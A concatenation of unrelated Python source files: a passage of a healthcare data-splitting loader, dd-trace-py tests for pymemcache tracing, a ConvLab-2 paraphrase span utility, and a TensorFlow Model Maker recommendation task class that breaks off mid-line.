data or not split_ratio : list, optional (default=[0.64,0.16,0.2]) used for split whole data into train/valid/test data_root : str, optional (default='') if data_root=='', use data in ./datasets; else use data in data_root n_limit : int, optional (default = -1) used for sample N-data not for all data, if n_limit==-1, use all data """ self.sel_task = sel_task if data_root == '': raise Exception('fill in correct data_root') all_list = [] l_list = [] episode_dir = os.path.join(data_root, 'x_data') feat_n, label_n = 0, 0 label_seq = pd.read_csv(os.path.join(data_root, 'y_data', self.sel_task + '.csv')).values for row_id in trange(len(label_seq)): if n_limit>0 and row_id>n_limit: break time.sleep(0.01) row = label_seq[row_id, :] concrete_path = os.path.join(episode_dir, row[0]) if os.path.exists(concrete_path) is False: continue seq_l, feat_n_all = pd.read_csv(concrete_path).shape if seq_l < 2: continue all_list.append([concrete_path] + [seq_l] + row[1:].astype(float).tolist()) label_n = len(row[1:]) feat_n = feat_n_all - 1 # shuffle the list if shuffle: random.shuffle(all_list) N = len(all_list) x_list = [] y_list = [] l_list = [] for item in all_list: x_list.append(item[0]) l_list.append(item[1]) y_list.append(np.array(item[2:]).astype(float)) train_ratio = split_ratio[0] valid_ratio = split_ratio[1] training_x = x_list[: int(train_ratio * N)] validing_x = x_list[int(train_ratio * N): int( (train_ratio + valid_ratio) * N)] testing_x = x_list[int((train_ratio + valid_ratio) * N):] training_y = y_list[: int(train_ratio * N)] validing_y = y_list[int(train_ratio * N): int( (train_ratio + valid_ratio) * N)] testing_y = y_list[int((train_ratio + valid_ratio) * N):] training_l = l_list[: int(train_ratio * N)] validing_l = l_list[int(train_ratio * N): int( (train_ratio + valid_ratio) * N)] testing_l = l_list[int((train_ratio + valid_ratio) * N):] if os.path.exists(self.expdata_dir) is False: os.makedirs(self.expdata_dir) pickle.dump(training_x, open( os.path.join(self.expdata_dir, 'train_x.pkl'), 'wb')) pickle.dump(validing_x, open( os.path.join(self.expdata_dir, 'valid_x.pkl'), 'wb')) pickle.dump(testing_x, open( os.path.join(self.expdata_dir, 'test_x.pkl'), 'wb')) print ('finished X generate') pickle.dump(training_y, open( os.path.join(self.expdata_dir, 'train_y.pkl'), 'wb')) pickle.dump(validing_y, open( os.path.join(self.expdata_dir, 'valid_y.pkl'), 'wb')) pickle.dump(testing_y, open( os.path.join(self.expdata_dir, 'test_y.pkl'), 'wb')) print ('finished Y generate') pickle.dump(training_l, open( os.path.join(self.expdata_dir, 'train_l.pkl'), 'wb')) pickle.dump(validing_l, open( os.path.join(self.expdata_dir, 'valid_l.pkl'), 'wb')) pickle.dump(testing_l, open( os.path.join(self.expdata_dir, 'test_l.pkl'), 'wb')) print ('finished L generate') expdata_statistic = { 'task':self.sel_task, 'raio': split_ratio, 'feat_n': feat_n, 'label_n': label_n, 'len_train': len(training_x), 'len_valid': len(validing_x), 'len_test': len(testing_x) } pickle.dump(expdata_statistic, open( os.path.join(self.expdata_dir, 'expdata_statistic.pkl'), 'wb')) self.train = {'x': training_x, 'y': training_y, 'l': training_l, 'feat_n': feat_n, 'label_n': label_n} self.valid = {'x': validing_x, 'y': validing_y, 'l': validing_l, 'feat_n': feat_n, 'label_n': label_n} self.test = {'x': testing_x, 'y': testing_y, 'l': testing_l, 'feat_n': feat_n, 'label_n': label_n} print('generate finished') print('target Task:', expdata_statistic['task']) print('N of features:', expdata_statistic['feat_n']) print('N of labels:', expdata_statistic['label_n']) print('N of TrainData:', expdata_statistic['len_train']) print('N of ValidData:', expdata_statistic['len_valid']) print('N of TestData:', expdata_statistic['len_test']) def load_exp_data(self): if os.path.exists(self.expdata_dir) is False: raise Exception('cannot find exp data dir {0}'.format(self.expdata_dir)) training_x = pickle.load(open( os.path.join(self.expdata_dir, 'train_x.pkl'), 'rb')) validing_x = pickle.load(open( os.path.join(self.expdata_dir, 'valid_x.pkl'), 'rb')) testing_x = pickle.load(open( os.path.join(self.expdata_dir, 'test_x.pkl'), 'rb')) training_y = pickle.load(open( os.path.join(self.expdata_dir, 'train_y.pkl'), 'rb')) validing_y = pickle.load(open( os.path.join(self.expdata_dir, 'valid_y.pkl'), 'rb')) testing_y = pickle.load(open( os.path.join(self.expdata_dir, 'test_y.pkl'), 'rb')) training_l = pickle.load(open( os.path.join(self.expdata_dir, 'train_l.pkl'), 'rb')) validing_l = pickle.load(open( os.path.join(self.expdata_dir, 'valid_l.pkl'), 'rb')) testing_l = pickle.load(open( os.path.join(self.expdata_dir, 'test_l.pkl'), 'rb')) expdata_statistic = pickle.load(open( os.path.join(self.expdata_dir, 'expdata_statistic.pkl'), 'rb')) feat_n = expdata_statistic['feat_n'] label_n = expdata_statistic['label_n'] self.train = {'x': training_x, 'y': training_y, 'l': training_l, 'feat_n': feat_n, 'label_n': label_n} self.valid = {'x': validing_x, 'y': validing_y, 'l': validing_l, 'feat_n': feat_n, 'label_n': label_n} self.test = {'x': testing_x, 'y': testing_y, 'l': testing_l, 'feat_n': feat_n, 'label_n': label_n} print('load finished') print('target Task:', expdata_statistic['task']) print('N of features:', expdata_statistic['feat_n']) print('N of labels:', expdata_statistic['label_n']) print('N of TrainData:', expdata_statistic['len_train']) print('N of ValidData:', expdata_statistic['len_valid']) print('N of TestData:', expdata_statistic['len_test']) def show_data(self, k=3): """ Parameters ---------- k : int, optional (default=3) fetch k sample data for show """ print('------------Train--------------') print('x_data', self.train['x'][:k]) print('y_data', self.train['y'][:k]) print('l_data', self.train['l'][:k]) print('------------Valid--------------') print('x_data', self.valid['x'][:k]) print('y_data', self.valid['y'][:k]) print('l_data', self.valid['l'][:k]) print('------------Test--------------') print('x_data', self.test['x'][:k]) print('y_data', self.test['y'][:k]) print('l_data', self.test['l'][:k]) class ecgdata: def __init__(self, expdata_id, root_dir='.'): """ experiment data generat class for cms datasets Parameters ---------- exp_id : str, optional (default='init.test') name of current experiment """ self.expdata_id = expdata_id check_expdata_dir(expdata_id = expdata_id) self.root_dir = root_dir self.expdata_dir = os.path.join(self.root_dir, 'experiments_data', self.expdata_id) print( 'Current ExpData_ID: {0} --- Target for ECG'.format( self.expdata_id)) def get_exp_data(self, sel_task='diagnose', shuffle=True, split_ratio=[0.64, 0.16, 0.2], data_root = '', n_limit = -1): """ Parameters ---------- task : str, optional (default='phenotyping') name of current healthcare task shuffle : bool, optional (default=True) determine whether shuffle data or not split_ratio : list, optional (default=[0.64,0.16,0.2]) used for split whole data into train/valid/test data_root : str, optional (default='') if data_root=='', use data in ./datasets; else use data in data_root n_limit : int, optional (default = -1) used for sample N-data not for all data, if n_limit==-1, use all data """ self.sel_task = sel_task if data_root == '': raise Exception('fill in correct data_root') all_list = [] l_list = [] episode_dir = os.path.join(data_root, 'x_data') feat_n, label_n = 0, 0 feat_seq = pickle.load(open(os.path.join(data_root, 'x_data', 'feat.pkl'), 'rb')) label_seq = pickle.load(open(os.path.join(data_root, 'y_data', self.sel_task + '.pkl'), 'rb')) label_n = np.shape(label_seq)[1] feat_n = np.shape(feat_seq)[1] for cur_i, each_label in enumerate(label_seq): all_list.append(each_label.tolist() + feat_seq[cur_i].tolist()) # shuffle the list if shuffle: random.shuffle(all_list) N = len(all_list) x_list = [] y_list = [] for item in all_list: x_list.append(np.array(item[label_n:]).astype(float)) y_list.append(np.array(item[:label_n]).astype(float)) train_ratio = split_ratio[0] valid_ratio = split_ratio[1] training_x = x_list[: int(train_ratio * N)] validing_x = x_list[int(train_ratio * N): int( (train_ratio + valid_ratio) * N)] testing_x = x_list[int((train_ratio + valid_ratio) * N):] training_y = y_list[: int(train_ratio * N)] validing_y = y_list[int(train_ratio * N): int( (train_ratio + valid_ratio) * N)] testing_y = y_list[int((train_ratio + valid_ratio) * N):] if os.path.exists(self.expdata_dir) is False: os.makedirs(self.expdata_dir) pickle.dump(training_x, open( os.path.join(self.expdata_dir, 'train_x.pkl'), 'wb')) pickle.dump(validing_x, open( os.path.join(self.expdata_dir, 'valid_x.pkl'), 'wb')) pickle.dump(testing_x, open( os.path.join(self.expdata_dir, 'test_x.pkl'), 'wb')) print ('finished X generate') pickle.dump(training_y, open( os.path.join(self.expdata_dir, 'train_y.pkl'), 'wb')) pickle.dump(validing_y, open( os.path.join(self.expdata_dir, 'valid_y.pkl'), 'wb')) pickle.dump(testing_y, open( os.path.join(self.expdata_dir, 'test_y.pkl'), 'wb')) print ('finished Y generate') expdata_statistic = { 'task':self.sel_task, 'raio': split_ratio, 'feat_n': feat_n, 'label_n': label_n, 'len_train': len(training_x), 'len_valid': len(validing_x), 'len_test': len(testing_x) } pickle.dump(expdata_statistic, open( os.path.join(self.expdata_dir, 'expdata_statistic.pkl'), 'wb')) self.train = {'x': training_x, 'y': training_y, 'feat_n': feat_n, 'label_n': label_n} self.valid = {'x': validing_x, 'y': validing_y, 'feat_n': feat_n, 'label_n': label_n} self.test = {'x': testing_x, 'y': testing_y, 'feat_n': feat_n, 'label_n': label_n} print('generate finished') print('target Task:', expdata_statistic['task']) print('N of features:', expdata_statistic['feat_n']) print('N of labels:', expdata_statistic['label_n']) print('N of TrainData:', expdata_statistic['len_train']) print('N of ValidData:', expdata_statistic['len_valid']) print('N of TestData:', expdata_statistic['len_test']) def load_exp_data(self): if os.path.exists(self.expdata_dir) is False: raise Exception('cannot find exp data dir {0}'.format(self.expdata_dir)) training_x = pickle.load(open( os.path.join(self.expdata_dir, 'train_x.pkl'), 'rb')) validing_x = pickle.load(open( os.path.join(self.expdata_dir, 'valid_x.pkl'), 'rb')) testing_x = pickle.load(open( os.path.join(self.expdata_dir, 'test_x.pkl'), 'rb')) training_y = pickle.load(open( os.path.join(self.expdata_dir, 'train_y.pkl'), 'rb')) validing_y = pickle.load(open( os.path.join(self.expdata_dir, 'valid_y.pkl'), 'rb')) testing_y = pickle.load(open( os.path.join(self.expdata_dir, 'test_y.pkl'), 'rb')) expdata_statistic = pickle.load(open( os.path.join(self.expdata_dir, 'expdata_statistic.pkl'), 'rb')) feat_n = expdata_statistic['feat_n'] label_n = expdata_statistic['label_n'] self.train = {'x': training_x, 'y': training_y, 'feat_n': feat_n, 'label_n': label_n} self.valid = {'x': validing_x, 'y': validing_y, 'feat_n': feat_n, 'label_n': label_n} self.test = {'x': testing_x, 'y': testing_y, 'feat_n': feat_n, 'label_n': label_n} print('load finished') print('target Task:', expdata_statistic['task']) print('N of features:', expdata_statistic['feat_n']) print('N of labels:', expdata_statistic['label_n']) print('N of TrainData:', expdata_statistic['len_train']) print('N of ValidData:', expdata_statistic['len_valid']) print('N of TestData:', expdata_statistic['len_test']) def show_data(self, k=3): """ Parameters ---------- k : int, optional (default=3) fetch k sample data for show """ print('------------Train--------------') print('x_data', self.train['x'][:k]) print('y_data', self.train['y'][:k]) print('------------Valid--------------') print('x_data', self.valid['x'][:k]) print('y_data', self.valid['y'][:k]) print('------------Test--------------') print('x_data', self.test['x'][:k]) print('y_data', self.test['y'][:k]) class textdata: def __init__(self, expdata_id, root_dir='.'): """ experiment data generat class for cms datasets Parameters ---------- exp_id : str, optional (default='init.test') name of current experiment """ self.expdata_id = expdata_id check_expdata_dir(expdata_id = expdata_id) self.root_dir = root_dir self.expdata_dir = os.path.join(self.root_dir, 'experiments_data', self.expdata_id) print( 'Current ExpData_ID: {0} --- Target for Clinical Notes'.format( self.expdata_id)) def get_exp_data(self, sel_task='diagnose', shuffle=True, split_ratio=[0.64, 0.16, 0.2], data_root = '', n_limit = -1): """ Parameters ---------- task : str, optional (default='phenotyping') name of current healthcare task shuffle : bool, optional (default=True) determine whether shuffle data or not split_ratio : list, optional (default=[0.64,0.16,0.2]) used for split whole data into train/valid/test data_root : str, (default='') use data in data_root n_limit : int, optional (default = -1) used for sample N-data not for all data, if n_limit==-1, use all data """ self.sel_task = sel_task if data_root == '': raise Exception('fill in correct data_root') all_list = [] l_list = [] episode_dir = os.path.join(data_root, 'x_data') feat_n, label_n = 0, 0 label_seq = pd.read_csv(os.path.join(data_root, 'y_data', self.sel_task + '.csv')).values for row_id in trange(len(label_seq)): if n_limit>0 and row_id>n_limit: break time.sleep(0.01) row = label_seq[row_id, :] concrete_path = os.path.join(episode_dir, row[0]) if os.path.exists(concrete_path) is False: continue all_list.append([concrete_path] + row[1:].astype(float).tolist()) label_n = len(row[1:]) # shuffle the list if shuffle: random.shuffle(all_list) N = len(all_list) x_list = [] y_list = [] for item in all_list: x_list.append(item[0]) y_list.append(np.array(item[1:]).astype(float)) train_ratio = split_ratio[0] valid_ratio = split_ratio[1] training_x = x_list[: int(train_ratio * N)] validing_x = x_list[int(train_ratio * N): int( (train_ratio + valid_ratio) * N)] testing_x = x_list[int((train_ratio + valid_ratio) * N):] training_y = y_list[: int(train_ratio * N)] validing_y = y_list[int(train_ratio * N): int( (train_ratio + valid_ratio) * N)] testing_y = y_list[int((train_ratio + valid_ratio) * N):] if os.path.exists(self.expdata_dir) is False: os.makedirs(self.expdata_dir) pickle.dump(training_x, open( os.path.join(self.expdata_dir, 'train_x.pkl'), 'wb')) pickle.dump(validing_x, open( os.path.join(self.expdata_dir, 'valid_x.pkl'), 'wb')) pickle.dump(testing_x, open( os.path.join(self.expdata_dir, 'test_x.pkl'), 'wb')) print ('finished X generate') pickle.dump(training_y, open( os.path.join(self.expdata_dir, 'train_y.pkl'), 'wb')) pickle.dump(validing_y, open( os.path.join(self.expdata_dir, 'valid_y.pkl'), 'wb')) pickle.dump(testing_y, open( os.path.join(self.expdata_dir, 'test_y.pkl'), 'wb')) print ('finished Y generate') expdata_statistic = { 'task':self.sel_task, 'raio': split_ratio, 'label_n': label_n, 'len_train': len(training_x), 'len_valid': len(validing_x), 'len_test': len(testing_x) } pickle.dump(expdata_statistic, open( os.path.join(self.expdata_dir, 'expdata_statistic.pkl'), 'wb')) self.train = {'x': training_x, 'y': training_y, 'label_n': label_n} self.valid = {'x': validing_x, 'y': validing_y, 'label_n': label_n} self.test = {'x': testing_x, 'y': testing_y, 'label_n': label_n} print('generate finished') print('target Task:', expdata_statistic['task']) print('N of labels:', expdata_statistic['label_n']) print('N of TrainData:', expdata_statistic['len_train']) print('N of ValidData:', expdata_statistic['len_valid']) print('N of TestData:', expdata_statistic['len_test']) def load_exp_data(self): if os.path.exists(self.expdata_dir) is False: raise Exception('cannot find exp data dir {0}'.format(self.expdata_dir)) training_x = pickle.load(open( os.path.join(self.expdata_dir, 'train_x.pkl'), 'rb')) validing_x = pickle.load(open( os.path.join(self.expdata_dir, 'valid_x.pkl'), 'rb')) testing_x = pickle.load(open( os.path.join(self.expdata_dir, 'test_x.pkl'), 'rb')) training_y = pickle.load(open( os.path.join(self.expdata_dir, 'train_y.pkl'), 'rb')) validing_y = pickle.load(open( os.path.join(self.expdata_dir, 'valid_y.pkl'), 'rb')) testing_y = pickle.load(open( os.path.join(self.expdata_dir, 'test_y.pkl'), 'rb')) expdata_statistic = pickle.load(open( os.path.join(self.expdata_dir, 'expdata_statistic.pkl'), 'rb')) label_n = expdata_statistic['label_n'] self.train = {'x': training_x, 'y': training_y, 'label_n': label_n} self.valid = {'x': validing_x, 'y': validing_y, 'label_n': label_n} self.test = {'x': testing_x, 'y': testing_y, 'label_n': label_n} print('load finished') print('target Task:', expdata_statistic['task']) print('N of labels:', expdata_statistic['label_n']) print('N of TrainData:', expdata_statistic['len_train']) print('N of ValidData:', expdata_statistic['len_valid']) print('N of TestData:', expdata_statistic['len_test']) def show_data(self, k=3): """ Parameters ---------- k : int, optional (default=3) fetch k sample data for show """ print('------------Train--------------') print('x_data', self.train['x'][:k]) print('y_data', self.train['y'][:k]) print('------------Valid--------------') print('x_data', self.valid['x'][:k]) print('y_data', self.valid['y'][:k]) print('------------Test--------------') print('x_data', self.test['x'][:k]) print('y_data', self.test['y'][:k]) if __name__ == '__main__': print ('hello world') test_txt = textdata('test.1.text') test_txt.get_exp_data(sel_task='diagnose',data_root = './datasets/text') test_txt.load_exp_data()
tests/contrib/pymemcache/test_client.py
p7g/dd-trace-py
308
12748161
# 3p import pymemcache from pymemcache.exceptions import MemcacheClientError from pymemcache.exceptions import MemcacheIllegalInputError from pymemcache.exceptions import MemcacheServerError from pymemcache.exceptions import MemcacheUnknownCommandError from pymemcache.exceptions import MemcacheUnknownError import pytest # project from ddtrace import Pin from ddtrace.contrib.pymemcache.client import WrappedClient from ddtrace.contrib.pymemcache.patch import patch from ddtrace.contrib.pymemcache.patch import unpatch from ddtrace.vendor import wrapt from tests.utils import DummyTracer from tests.utils import TracerTestCase from .test_client_mixin import PYMEMCACHE_VERSION from .test_client_mixin import PymemcacheClientTestCaseMixin from .test_client_mixin import TEST_HOST from .test_client_mixin import TEST_PORT from .utils import MockSocket from .utils import _str _Client = pymemcache.client.base.Client class PymemcacheClientTestCase(PymemcacheClientTestCaseMixin): """Tests for a patched pymemcache.client.base.Client.""" def test_patch(self): assert issubclass(pymemcache.client.base.Client, wrapt.ObjectProxy) client = self.make_client([]) self.assertIsInstance(client, wrapt.ObjectProxy) def test_unpatch(self): unpatch() from pymemcache.client.base import Client self.assertEqual(Client, _Client) def test_set_get(self): client = self.make_client([b"STORED\r\n", b"VALUE key 0 5\r\nvalue\r\nEND\r\n"]) client.set(b"key", b"value", noreply=False) result = client.get(b"key") assert _str(result) == "value" self.check_spans(2, ["set", "get"], ["set key", "get key"]) def test_append_stored(self): client = self.make_client([b"STORED\r\n"]) result = client.append(b"key", b"value", noreply=False) assert result is True self.check_spans(1, ["append"], ["append key"]) def test_prepend_stored(self): client = self.make_client([b"STORED\r\n"]) result = client.prepend(b"key", b"value", noreply=False) assert result is True self.check_spans(1, ["prepend"], ["prepend key"]) def test_cas_stored(self): client = self.make_client([b"STORED\r\n"]) result = client.cas(b"key", b"value", b"0", noreply=False) assert result is True self.check_spans(1, ["cas"], ["cas key"]) def test_cas_exists(self): client = self.make_client([b"EXISTS\r\n"]) result = client.cas(b"key", b"value", b"0", noreply=False) assert result is False self.check_spans(1, ["cas"], ["cas key"]) def test_cas_not_found(self): client = self.make_client([b"NOT_FOUND\r\n"]) result = client.cas(b"key", b"value", b"0", noreply=False) assert result is None self.check_spans(1, ["cas"], ["cas key"]) def test_delete_exception(self): client = self.make_client([Exception("fail")]) def _delete(): client.delete(b"key", noreply=False) pytest.raises(Exception, _delete) spans = self.check_spans(1, ["delete"], ["delete key"]) self.assertEqual(spans[0].error, 1) def test_flush_all(self): client = self.make_client([b"OK\r\n"]) result = client.flush_all(noreply=False) assert result is True self.check_spans(1, ["flush_all"], ["flush_all"]) def test_incr_exception(self): client = self.make_client([Exception("fail")]) def _incr(): client.incr(b"key", 1) pytest.raises(Exception, _incr) spans = self.check_spans(1, ["incr"], ["incr key"]) self.assertEqual(spans[0].error, 1) def test_get_error(self): client = self.make_client([b"ERROR\r\n"]) def _get(): client.get(b"key") pytest.raises(MemcacheUnknownCommandError, _get) spans = self.check_spans(1, ["get"], ["get key"]) self.assertEqual(spans[0].error, 1) def test_get_unknown_error(self): client = self.make_client([b"foobarbaz\r\n"]) def _get(): client.get(b"key") pytest.raises(MemcacheUnknownError, _get) self.check_spans(1, ["get"], ["get key"]) def test_gets_found(self): client = self.make_client([b"VALUE key 0 5 10\r\nvalue\r\nEND\r\n"]) result = client.gets(b"key") assert result == (b"value", b"10") self.check_spans(1, ["gets"], ["gets key"]) def test_touch_not_found(self): client = self.make_client([b"NOT_FOUND\r\n"]) result = client.touch(b"key", noreply=False) assert result is False self.check_spans(1, ["touch"], ["touch key"]) def test_set_client_error(self): client = self.make_client([b"CLIENT_ERROR some message\r\n"]) def _set(): client.set("key", "value", noreply=False) pytest.raises(MemcacheClientError, _set) spans = self.check_spans(1, ["set"], ["set key"]) self.assertEqual(spans[0].error, 1) def test_set_server_error(self): client = self.make_client([b"SERVER_ERROR some message\r\n"]) def _set(): client.set(b"key", b"value", noreply=False) pytest.raises(MemcacheServerError, _set) spans = self.check_spans(1, ["set"], ["set key"]) self.assertEqual(spans[0].error, 1) def test_set_key_with_space(self): client = self.make_client([b""]) def _set(): client.set(b"key has space", b"value", noreply=False) pytest.raises(MemcacheIllegalInputError, _set) spans = self.check_spans(1, ["set"], ["set key has space"]) self.assertEqual(spans[0].error, 1) def test_quit(self): client = self.make_client([]) result = client.quit() assert result is None self.check_spans(1, ["quit"], ["quit"]) def test_replace_not_stored(self): client = self.make_client([b"NOT_STORED\r\n"]) result = client.replace(b"key", b"value", noreply=False) assert result is False self.check_spans(1, ["replace"], ["replace key"]) def test_version_success(self): client = self.make_client([b"VERSION 1.2.3\r\n"], default_noreply=False) result = client.version() assert result == b"1.2.3" self.check_spans(1, ["version"], ["version"]) def test_stats(self): client = self.make_client([b"STAT fake_stats 1\r\n", b"END\r\n"]) result = client.stats() if PYMEMCACHE_VERSION >= (3, 4, 0): assert client.sock.send_bufs == [b"stats\r\n"] else: assert client.sock.send_bufs == [b"stats \r\n"] assert result == {b"fake_stats": 1} self.check_spans(1, ["stats"], ["stats"]) def test_service_name_override(self): client = self.make_client([b"STORED\r\n", b"VALUE key 0 5\r\nvalue\r\nEND\r\n"]) Pin.override(client, service="testsvcname") client.set(b"key", b"value", noreply=False) result = client.get(b"key") assert _str(result) == "value" spans = self.get_spans() self.assertEqual(spans[0].service, "testsvcname") self.assertEqual(spans[1].service, "testsvcname") class PymemcacheHashClientTestCase(PymemcacheClientTestCaseMixin): """Tests for a patched pymemcache.client.hash.HashClient.""" def make_client_pool(self, hostname, mock_socket_values, serializer=None, **kwargs): mock_client = pymemcache.client.base.Client(hostname, serializer=serializer, **kwargs) tracer = DummyTracer() Pin.override(mock_client, tracer=tracer) mock_client.sock = MockSocket(mock_socket_values) client = pymemcache.client.base.PooledClient(hostname, serializer=serializer) client.client_pool = pymemcache.pool.ObjectPool(lambda: mock_client) return mock_client def make_client(self, mock_socket_values, **kwargs): from pymemcache.client.hash import HashClient tracer = DummyTracer() Pin.override(pymemcache, tracer=tracer) self.client = HashClient([(TEST_HOST, TEST_PORT)], **kwargs) for _c in self.client.clients.values(): _c.sock = MockSocket(list(mock_socket_values)) return self.client def test_patched_hash_client(self): client = self.make_client([b"STORED\r\n"]) if PYMEMCACHE_VERSION >= (3, 2, 0): assert client.client_class == WrappedClient assert len(client.clients) for _c in client.clients.values(): assert isinstance(_c, wrapt.ObjectProxy) def test_delete_many_found(self): """ delete_many internally calls client.delete so we should expect to get delete for our span resource. for base.Clients self.delete() is called which by-passes our tracing on delete() """ client = self.make_client([b"STORED\r", b"\n", b"DELETED\r\n"]) result = client.add(b"key", b"value", noreply=False) result = client.delete_many([b"key"], noreply=False) assert result is True self.check_spans(2, ["add", "delete"], ["add key", "delete key"]) class PymemcacheClientConfiguration(TracerTestCase): """Ensure that pymemache can be configured properly.""" def setUp(self): patch() def tearDown(self): unpatch() def make_client(self, mock_socket_values, **kwargs): tracer = DummyTracer() Pin.override(pymemcache, tracer=tracer) self.client = pymemcache.client.base.Client((TEST_HOST, TEST_PORT), **kwargs) self.client.sock = MockSocket(list(mock_socket_values)) return self.client def test_same_tracer(self): """Ensure same tracer reference is used by the pin on pymemache and Clients. """ client = pymemcache.client.base.Client((TEST_HOST, TEST_PORT)) self.assertEqual(Pin.get_from(client).tracer, Pin.get_from(pymemcache).tracer) def test_override_parent_pin(self): """Test that the service set on `pymemcache` is used for Clients.""" Pin.override(pymemcache, service="mysvc") client = self.make_client([b"STORED\r\n", b"VALUE key 0 5\r\nvalue\r\nEND\r\n"]) client.set(b"key", b"value", noreply=False) pin = Pin.get_from(pymemcache) tracer = pin.tracer spans = tracer.pop() self.assertEqual(spans[0].service, "mysvc") def test_override_client_pin(self): """Test that the service set on `pymemcache` is used for Clients.""" client = self.make_client([b"STORED\r\n", b"VALUE key 0 5\r\nvalue\r\nEND\r\n"]) Pin.override(client, service="mysvc2") client.set(b"key", b"value", noreply=False) pin = Pin.get_from(pymemcache) tracer = pin.tracer spans = tracer.pop() self.assertEqual(spans[0].service, "mysvc2") @TracerTestCase.run_in_subprocess(env_overrides=dict(DD_SERVICE="mysvc")) def test_user_specified_service(self): """ When a user specifies a service for the app The pymemcache integration should not use it. """ # Ensure that the service name was configured from ddtrace import config assert config.service == "mysvc" client = self.make_client([b"STORED\r\n", b"VALUE key 0 5\r\nvalue\r\nEND\r\n"]) client.set(b"key", b"value", noreply=False) pin = Pin.get_from(pymemcache) tracer = pin.tracer spans = tracer.pop() assert spans[0].service != "mysvc"
convlab2/laug/Text_Paraphrasing/utils.py
ljw23/ConvLab-2
339
12748173
# -*- coding: utf-8 -*- from convlab2.util.multiwoz.paraphrase_span_detection import phrase_idx_utt def paraphrase_span_detection(new_text,span_info): new_words=new_text.split() new_span_info=[] for span in span_info: span_words=span[2].split() result=phrase_idx_utt(span_words,new_words) if result is not None: max_start,max_end=result new_span_info.append([span[0],span[1],' '.join(new_words[max_start:max_end+1]),max_start,max_end]) return new_span_info def span2tuple(span_info): t=[] for span in span_info: t.append((span[0].split('-')[1],span[0].split('-')[0],span[1],span[2])) return t
tensorflow_examples/lite/model_maker/core/task/recommendation.py
duy-maimanh/examples
6,484
12748193
# Copyright 2020 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the 'License'); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an 'AS IS' BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """APIs to train an on-device recommendation model.""" import collections import tempfile import numpy as np import tensorflow as tf from tensorflow_examples.lite.model_maker.core.api import mm_export from tensorflow_examples.lite.model_maker.core.data_util import data_util from tensorflow_examples.lite.model_maker.core.data_util import recommendation_config from tensorflow_examples.lite.model_maker.core.export_format import ExportFormat from tensorflow_examples.lite.model_maker.core.task import custom_model from tensorflow_examples.lite.model_maker.core.task import model_util from tensorflow_examples.lite.model_maker.core.task.model_spec import recommendation_spec from tensorflow_examples.lite.model_maker.third_party.recommendation.ml.model import input_pipeline from tensorflow_examples.lite.model_maker.third_party.recommendation.ml.model import metrics as _metrics from tensorflow_examples.lite.model_maker.third_party.recommendation.ml.model import recommendation_model_launcher as _launcher @mm_export('recommendation.Recommendation') class Recommendation(custom_model.CustomModel): """Recommendation task class.""" DEFAULT_EXPORT_FORMAT = (ExportFormat.TFLITE,) ALLOWED_EXPORT_FORMAT = (ExportFormat.LABEL, ExportFormat.TFLITE, ExportFormat.SAVED_MODEL) # ID = 0 means a placeholder to OOV. Used for padding. OOV_ID = 0 def __init__(self, model_spec, model_dir, shuffle=True, learning_rate=0.1, gradient_clip_norm=1.0): """Init recommendation model. Args: model_spec: recommendation model spec. model_dir: str, path to export model checkpoints and summaries. shuffle: boolean, whether the training data should be shuffled. learning_rate: float, learning rate. gradient_clip_norm: float, clip threshold (<= 0 meaning no clip). """ if not isinstance(model_spec, recommendation_spec.RecommendationSpec): raise ValueError( 'Expect RecommendationSpec but got model_spec: {}'.format(model_spec)) self._model_dir = model_dir self._learning_rate = learning_rate self._gradient_clip_norm = gradient_clip_norm super(Recommendation, self).__init__(model_spec, shuffle=shuffle) @property def input_spec(self) -> recommendation_config.InputSpec: return self.model_spec.input_spec @property def model_hparams(self) -> recommendation_config.ModelHParams: return self.model_spec.model_hparams def create_model(self, do_train=True): """Creates a model. Args: do_train: boolean. Whether to train the model. Returns: Keras model. """ self.model = self.model_spec.create_model() if do_train: _launcher.compile_model(self.model, self.model_hparams.eval_top_k, self._learning_rate, self._gradient_clip_norm) def train(self, train_data, validation_data=None, batch_size=16, steps_per_epoch=100, epochs=1): """Feeds the training data for training. Args: train_data: Training dataset. validation_data: Validation data. If None, skips validation process. batch_size: int, the batch size. steps_per_epoch: int, the step of each epoch. epochs: int, number of epochs. Returns: History from model.fit(). """ batch_size = batch_size if batch_size else self.model_spec.batch_size train_ds = train_data.gen_dataset( batch_size, is_training=True, shuffle=self.shuffle) if validation_data: validation_ds = validation_data.gen_dataset(batch_size, is_training=False) else: validation_ds = None self.create_model(do_train=True) history = self.model.fit( x=train_ds, validation_data=validation_ds, steps_per_epoch=steps_per_epoch, epochs=epochs, callbacks=self._keras_callbacks(self._model_dir)) tf.get_logger().info(history) return history def evaluate(self, data, batch_size=10): """Evaluate the model. Args: data: Evaluation data. batch_size: int, batch size for evaluation. Returns: History from model.evaluate(). """ batch_size = batch_size if batch_size else self.model_spec.batch_size eval_ds = data.gen_dataset(batch_size, is_training=False) history = self.model.evaluate(eval_ds) tf.get_logger().info(history) return history def _keras_callbacks(self, model_dir): """Returns a list of default keras callbacks for `model.fit`.""" return _launcher.get_callbacks(self.model, model_dir) def _get_serve_fn(self, keras_model): """Gets serve fn for exporting model.""" input_specs = input_pipeline.get_serving_input_specs(self.input_spec) return keras_model.serve.get_concrete_function(**input_specs) def _export_tflite(self, tflite_filepath): """Exports tflite model.""" serve_fn = self._get_serve_fn(self.model) # Providing trackable objects is now recommended since it will make the # concrete function conversion API be based on the new SavedModel importer, # which will enable new TensorFlow Lite features including variable support, # resources and variant tensor, and signature concept. if float('.'.join(tf.__version__.split('.')[:2])) >= 2.7: converter = tf.lite.TFLiteConverter.from_concrete_functions([serve_fn], self.model) else: converter = tf.lite.TFLiteConverter.from_concrete_functions([serve_fn]) tflite_model = converter.convert() with tf.io.gfile.GFile(tflite_filepath, 'wb') as f: f.write(tflite_model) def _export_saved_model(self, filepath): serve_fn = self._get_serve_fn(self.model) signatures = {tf.saved_model.DEFAULT_SERVING_SIGNATURE_DEF_KEY: serve_fn} tf.saved_model.save(self.model, export_dir=filepath, signatures=signatures) def evaluate_tflite(self, tflite_filepath, data): """Evaluates the tflite model. The data is padded to required length, and multiple metrics are evaluated. Args: tflite_filepath: File path to the TFLite model. data: Data to be evaluated. Returns: Dict of (metric, value), evaluation result of TFLite model. """ label_name = 